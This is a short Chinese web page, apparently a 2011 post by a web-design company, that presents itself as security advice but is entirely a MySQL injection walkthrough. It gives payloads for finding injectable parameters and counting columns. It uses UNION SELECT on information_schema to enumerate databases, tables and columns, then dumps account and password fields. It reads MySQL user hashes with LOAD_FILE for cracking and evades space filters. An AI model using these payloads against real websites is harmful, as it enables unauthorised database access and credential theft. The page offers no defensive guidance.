網(wǎng)站制作安全之mysql注入技巧
來(lái)源:昆明多彩網(wǎng)絡(luò )公司 日期:2011-09-19 閱讀: 發(fā)表評論
mysql注入大致流程:
1、得到注入點(diǎn),在頁(yè)面參數后面加'或者and 1=1和and 1=2測試,如果程序報錯或者有一些異常情況(比如執行結果不同)發(fā)生則表明該頁(yè)面有漏洞存在。
2、在參數后面加入 order by 10,10,如果沒(méi)有什么反應則將后面的10繼續增加,如果報錯就說(shuō)明字段數少于該數。
3、暴數據庫名,假設當前被注入表的字段數有3個(gè),通過(guò)下面兩種方式得到
3.1 union select database(),user(),version()
3.1 在后面加入 union select 1,SCHEMA_NAME,3 from information_schema.SCHEMATA limit 2,1,將得到數據庫名稱(chēng),第一個(gè)數據庫為information_schema
4、暴表名,and 1=2 union select 1,table_name,3 from (select * from information_schema.tables where table_schema=0x6861636B)t limit 0,1 0x6861636B為數據庫名稱(chēng)轉成了16進(jìn)制,用小葵花工具轉換得到,通過(guò)上一步可以得到,注意limit前面的t不能省略。
5、暴字段名 and 1=2 union select 1,2,column_name from (select * from information_schema.columns where table_name=0x61646D696E and table_schema=0x6861636B)t limit 0,1;0x61646D696E為表名,table_schema為字段名。
6、union select 1,"字段1","字段2" from "表名" limit 0,1,就可以得到帳戶(hù)和密碼了。
7、其他:得到root的密碼通過(guò)LOAD_FILE(’C:\..\MYSQL\DATA\MYSQL\USER.MYD’)得到用戶(hù)的HASH散列,之后用CAIN爆破…如果程序過(guò)濾了空格,可以使用/**/相當于空格作用
發(fā)表評論評論列表(有 條評論)